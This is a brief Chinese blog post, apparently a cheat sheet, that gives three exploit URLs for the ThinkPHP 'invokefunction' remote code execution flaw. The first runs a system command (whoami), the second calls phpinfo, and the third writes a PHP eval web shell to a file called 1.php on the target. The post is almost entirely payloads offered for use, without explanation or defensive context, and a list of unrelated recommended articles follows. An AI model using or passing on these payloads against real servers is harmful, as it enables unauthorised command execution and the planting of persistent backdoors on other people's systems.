Thinkphp(TP)

谪仙1232024-09-24 12:16

1.远程命令执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

2.远程代码执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

3.getshell

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST[cmd]);?>' >1.php

相关推荐
virelin_Y.lin1 小时前
系统与网络安全------弹性交换网络(2)
网络·安全·web安全·链路聚合·lacp·eth-trunk
go_to_hacker4 小时前
安恒web安全春招实战
安全·web安全·网络安全·渗透测试
AI拉呱_8 小时前
医院行业等保2.0案例
安全·web安全
2301_810154559 小时前
纯真社区IP库离线版发布更新
web安全
帅云毅12 小时前
文件上传--解析漏洞和编辑器
笔记·学习·安全·web安全·编辑器·php
云天徽上13 小时前
【数据可视化-27】全球网络安全威胁数据可视化分析(2015-2024)
人工智能·安全·web安全·机器学习·信息可视化·数据分析
墨北x1 天前
网络安全职业技能大赛Server2003
安全·web安全
ALe要立志成为web糕手1 天前
create_function()漏洞利用
安全·web安全·网络安全·php·rce
K.A.L2 天前
熊海CMS Cookie脆弱
web安全
半个西瓜.2 天前
武装Burp Suite工具:xia SQL自动化测试_插件
安全·web安全·网络安全·安全威胁分析
热门推荐
01KGG转MP3工具|非KGM文件|解密音频02从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑03我决定放弃搞 Java 了04Coze扣子平台完整体验和实践(附国内和国际版对比)05YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】06DeepSeek各版本说明与优缺点分析07yolov8,yolo11,yolo12 服务器训练到部署全流程 笔记08苍穹外卖面试总结09如何在WPS和Word/Excel中直接使用DeepSeek功能10【2025年最新】OpenWrt 更换国内源的指南(图形界面版)